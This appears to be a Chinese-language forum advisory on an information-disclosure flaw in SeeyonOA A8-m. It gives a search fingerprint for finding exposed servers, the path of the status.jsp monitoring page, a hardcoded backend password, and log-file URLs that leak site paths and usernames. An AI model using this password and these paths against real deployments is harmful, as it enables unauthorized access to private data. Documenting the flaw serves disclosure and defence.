SeeyonOA A8 status.jsp 信息泄露漏洞

# SeeyonOA A8 status.jsp 信息泄露漏洞 ## 漏洞描述 SeeyonOA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击 ## 漏洞影响 SeeyonOA...

SeeyonOA A8 status.jsp 信息泄露漏洞

漏洞描述

SeeyonOA A8-m 存在状态监控页面信息泄露,攻击者可以从其中获取网站路径和用户名等敏感信息进一步攻击

漏洞影响

SeeyonOA A8-m

网络测绘

title="A8-m"

漏洞复现

访问监控页面

/seeyon/management/status.jsp

img

后台密码为 WLCCYBD@SEEYON

登录后通过如下url获得一些敏感信息

/seeyon/management/status.jsp
/seeyon/logs/login.log
/seeyon/logs/v3x.log

img

img

img

  • 发表于 2024-07-12 18:44:25
  • 阅读 ( 2317 )
  • 分类:OA产品

0 条评论

请先 登录 后评论
带头大哥
带头大哥

456 篇文章

站长统计